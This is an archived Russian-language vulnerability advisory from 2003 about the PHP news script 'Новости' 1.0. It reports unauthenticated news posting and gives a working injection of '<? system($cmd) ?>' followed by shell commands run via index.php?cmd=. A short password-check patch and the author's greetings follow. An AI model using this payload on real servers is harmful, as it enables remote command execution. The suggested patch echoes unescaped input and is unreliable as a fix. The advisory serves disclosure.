Новости

2003-03-31T00:00:00
ID SECURITYVULNS:DOC:4303
Type securityvulns
Reporter Securityvulns
Modified 2003-03-31T00:00:00

Description

Product: Новости Version: 1.0 OffSite: http://xonix.ru Problem: Добавление новостей


Можно добавлять новости без авторизации.

http://[target]/admin/script.php?data=ENTER_THIS_YOUR_NEWS.

Пример:

http://[target]/admin/script.php?data=script.php?data=<? system($cmd) ?> затем открыть http://[target]/index.php?cmd=id;uname -a; etc...

Патч.

Добавьте в файл index.php строку: <input type=hidden name=pass value=<?=$pass?>> перед </form>

А в файл script.php добавьте после строки include("config.php"); if (!isset($pass)) exit; $q=strcmp($pass,$password);

greetz: GipsHack, DHGroup, subj, Lobst, and all, who know me

Contacts: www.overg.com www.dwcgr0up.com irc.zaingandol.org #DWC ogprog@ukr.net

Best regards, Over G[DWC Gr0up]